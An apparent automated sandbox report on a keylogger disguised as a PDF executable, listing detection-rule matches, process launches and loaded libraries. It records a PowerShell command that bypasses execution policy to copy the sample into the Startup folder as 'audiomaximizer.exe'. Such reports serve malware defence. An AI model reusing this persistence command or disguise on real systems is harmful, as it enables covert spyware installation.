Source: 3.2.PDF-3093900299039 pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.audiomaximizer.exe.333b070.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.audiomaximizer.exe.3338830.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.PDF-3093900299039 pdf.exe.2a98348.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.PDF-3093900299039 pdf.exe.2a9ab88.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfdjqddg.a1u.ps1

Jump to behavior

Source: PDF-3093900299039 pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PDF-3093900299039 pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PDF-3093900299039 pdf.exe	Virustotal: Detection: 63%
Source: PDF-3093900299039 pdf.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

File read: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Process created: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe "C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
